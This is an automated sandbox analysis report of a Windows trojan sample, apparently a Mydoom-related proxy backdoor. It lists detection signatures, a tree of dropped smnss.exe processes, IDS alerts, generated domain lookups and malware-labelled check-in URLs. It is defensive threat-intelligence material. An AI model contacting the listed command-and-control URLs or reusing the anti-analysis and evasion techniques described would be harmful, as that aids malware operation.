Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GxELazkKkG.exe

Overview

General Information

Sample Name:GxELazkKkG.exe
Analysis ID:740373
MD5:a3b0b86095211519a0e93f79fbecea26
SHA1:e84806aeee26b8976099a06c869676e7378c480c
SHA256:854a0dc9e4730e1734d426e2277cf9464fb6f255d3436c2489f13ba742319a69
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Query firmware table information (likely to detect VMs)
Contain functionality to detect virtual machines
Found API chain indicative of debugger detection
Machine Learning detection for sample
Machine Learning detection for dropped file
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Found evasive API chain (may stop execution after accessing registry keys)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • GxELazkKkG.exe (PID: 6036 cmdline: C:\Users\user\Desktop\GxELazkKkG.exe MD5: A3B0B86095211519A0E93F79FBECEA26)
    • smnss.exe (PID: 6032 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
      • WerFault.exe (PID: 1880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1284 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • smnss.exe (PID: 6132 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 4416 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 1548 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 4056 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 5244 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 5200 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • ctfmen.exe (PID: 5208 cmdline: ctfmen.exe MD5: BEFB073B1AE52E909D4EA54A5251185D)
      • smnss.exe (PID: 2812 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • smnss.exe (PID: 5152 cmdline: C:\Windows\system32\smnss.exe MD5: CB66C7C2135BF18590FD0775F6DD9ECA)
    • svchost.exe (PID: 4056 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:173.231.184.124192.168.2.780497152037771 11/07/22-22:12:54.222420
SID:2037771
Source Port:80
Destination Port:49715
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.772.251.233.24549709802807187 11/07/22-22:12:51.587059
SID:2807187
Source Port:49709
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:72.251.233.245192.168.2.780497092037771 11/07/22-22:12:51.848069
SID:2037771
Source Port:80
Destination Port:49709
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7107.6.74.7649710802807186 11/07/22-22:12:52.238913
SID:2807186
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7173.231.189.1549711802807187 11/07/22-22:12:52.680764
SID:2807187
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7173.231.189.1549711802807186 11/07/22-22:12:52.680764
SID:2807186
Source Port:49711
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:173.231.189.15192.168.2.780497112037771 11/07/22-22:12:52.803000
SID:2037771
Source Port:80
Destination Port:49711
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.764.70.19.20349736802807186 11/07/22-22:12:55.807493
SID:2807186
Source Port:49736
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.764.70.19.20349736802807187 11/07/22-22:12:55.807493
SID:2807187
Source Port:49736
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7199.21.76.8149712802807187 11/07/22-22:12:53.587513
SID:2807187
Source Port:49712
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:199.21.76.81192.168.2.780497122037771 11/07/22-22:12:53.757192
SID:2037771
Source Port:80
Destination Port:49712
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7199.21.76.8149712802807186 11/07/22-22:12:53.587513
SID:2807186
Source Port:49712
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7107.6.74.7649710802807187 11/07/22-22:12:52.238913
SID:2807187
Source Port:49710
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.772.251.233.24549709802807186 11/07/22-22:12:51.587059
SID:2807186
Source Port:49709
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7173.231.184.12449715802807186 11/07/22-22:12:54.099023
SID:2807186
Source Port:49715
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.7173.231.184.12449715802807187 11/07/22-22:12:54.099023
SID:2807187
Source Port:49715
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:107.6.74.76192.168.2.780497102037771 11/07/22-22:12:52.499655
SID:2037771
Source Port:80
Destination Port:49710
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: GxELazkKkG.exeReversingLabs: Detection: 100%
Source: GxELazkKkG.exeAvira: detected
Source: http://enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: http://hmpasnpmas.net/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: http://rmhhhmswqh.org/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: http://meahewphwa.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: http://pqarseshhn.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: http://whenaeqsar.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=UnkAvira URL Cloud: Label: malware
Source: C:\Windows\SysWOW64\ctfmen.exeAvira: detection malicious, Label: TR/Crypt.ULPM.Gen
Source: C:\Windows\SysWOW64\grcopy.dllAvira: detection malicious, Label: TR/Proxy.Gen
Source: C:\Windows\SysWOW64\smnss.exeAvira: detection malicious, Label: TR/Proxy.Gen
Source: C:\Windows\SysWOW64\shervans.dllAvira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Windows\SysWOW64\satornas.dllAvira: detection malicious, Label: HTML/ExpKit.Gen2
Source: GxELazkKkG.exeJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\ctfmen.exeJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\grcopy.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\zipfiaq.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\smnss.exeJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\zipfi.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\shervans.dllJoe Sandbox ML: detected
Source: 7.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 5.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 4.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.5.unpackAvira: Label: TR/Proxy.Gen
Source: 4.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 3.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 5.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 3.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 3.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 2.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 3.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 0.0.GxELazkKkG.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 4.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 2.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.4.unpackAvira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 9.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 2.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 5.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 5.0.smnss.exe.400000.2.unpackAvira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 2.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 10.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 9.2.smnss.exe.400000.0.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 8.0.ctfmen.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 4.0.smnss.exe.400000.3.unpackAvira: Label: TR/Proxy.Gen
Source: 1.0.smnss.exe.400000.1.unpackAvira: Label: TR/Proxy.Gen
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_0040447C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,sprintf,0_2_0040447C
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_0040447C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,sprintf,1_2_0040447C
Source: GxELazkKkG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,0_2_00403790
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,KiUserExceptionDispatcher,_mbscat,FindClose,1_2_00403790
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\Jump to behavior

Networking

barindex
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49709 -> 72.251.233.245:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49709 -> 72.251.233.245:80
Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 72.251.233.245:80 -> 192.168.2.7:49709
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49710 -> 107.6.74.76:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49710 -> 107.6.74.76:80
Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 107.6.74.76:80 -> 192.168.2.7:49710
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49711 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49711 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 173.231.189.15:80 -> 192.168.2.7:49711
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49712 -> 199.21.76.81:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49712 -> 199.21.76.81:80
Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 199.21.76.81:80 -> 192.168.2.7:49712
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49715 -> 173.231.184.124:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49715 -> 173.231.184.124:80
Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 173.231.184.124:80 -> 192.168.2.7:49715
Source: TrafficSnort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.7:49736 -> 64.70.19.203:80
Source: TrafficSnort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.7:49736 -> 64.70.19.203:80
Source: unknownDNS traffic detected: query: mwpmmeshma.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rwqmwaahsa.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qpnrsrhean.info replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hsqrpmnhwa.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: wwqeemeesr.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: shpqsasmrn.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: rwneseeers.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: shwwnharma.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nnrhanmhwn.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: amnrsmaaqh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hemqhqaema.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: anmmemmqms.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: prnaqpsqar.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: swrhaapnnr.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hmaeshmwmh.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: shmsemwams.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pnhhpawqpa.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: raheepmpnn.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: namrhepwnn.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: psmrewwhhh.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: sephpsappn.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: hpeemnapan.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nmnhwanmwh.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: snshrmsmmh.biz replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ampsqhrras.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: nhmqhmsrph.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: memmshersa.in replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qmmmshpqan.info replaycode: Name error (3)
Source: Joe Sandbox ViewASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS
Source: Joe Sandbox ViewIP Address: 64.70.19.203 64.70.19.203
Source: unknownNetwork traffic detected: DNS query count 35
Source: unknownDNS traffic detected: queries for: shpqsasmrn.biz
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00401C2C memset,memset,_mbscat,_mbscat,_mbscat,_mbscat,_mbscat,_mbscat,Sleep,send,recv,strtok,strtok,closesocket,atoi,atoi,memset,lstrlen,lstrcmp,lstrcmp,0_2_00401C2C
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: rmhhhmswqh.orgUser-Agent: explwer
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: whenaeqsar.inUser-Agent: explwer
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: pqarseshhn.inUser-Agent: explwer
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: meahewphwa.inUser-Agent: explwer
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: hmpasnpmas.netUser-Agent: explwer
Source: global trafficHTTP traffic detected: GET /imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk HTTP/1.1Host: enahmnhqah.wsUser-Agent: explwer
Source: smnss.exe, 00000001.00000000.262979672.0000000000968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: GxELazkKkG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Windows\SysWOW64\smnss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1284
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\ctfmen.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_004080540_2_00408054
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00408B600_2_00408B60
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_1000A0000_2_1000A000
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_004080541_2_00408054
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00408B601_2_00408B60
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: String function: 00404C38 appears 47 times
Source: C:\Windows\SysWOW64\smnss.exeCode function: String function: 00404C38 appears 47 times
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: GxELazkKkG.exeReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile read: C:\Users\user\Desktop\GxELazkKkG.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\GxELazkKkG.exe C:\Users\user\Desktop\GxELazkKkG.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\ctfmen.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1284
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Windows\SysWOW64\ctfmen.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Windows\SysWOW64\smnss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00404DF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,0_2_00404DF4
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00404DF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,1_2_00404DF4
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F61.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@23/15@35/7
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00404D3A CreateToolhelp32Snapshot,Process32First,strcmp,OpenProcess,TerminateProcess,Process32Next,0_2_00404D3A
Source: C:\Users\user\Desktop\GxELazkKkG.exeMutant created: \Sessions\1\BaseNamedObjects\x_socks5aan
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032
Source: C:\Windows\SysWOW64\smnss.exeMutant created: \Sessions\1\BaseNamedObjects\VULnaShvolna
Source: C:\Windows\SysWOW64\smnss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\GxELazkKkG.exeUnpacked PE file: 0.2.GxELazkKkG.exe.400000.0.unpack 6g07wrku:EW;6365kzxz:EW;6052xbfe:W; vs 6g07wrku:ER;6365kzxz:ER;6052xbfe:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 2.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 3.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 4.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 5.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 6.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 7.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
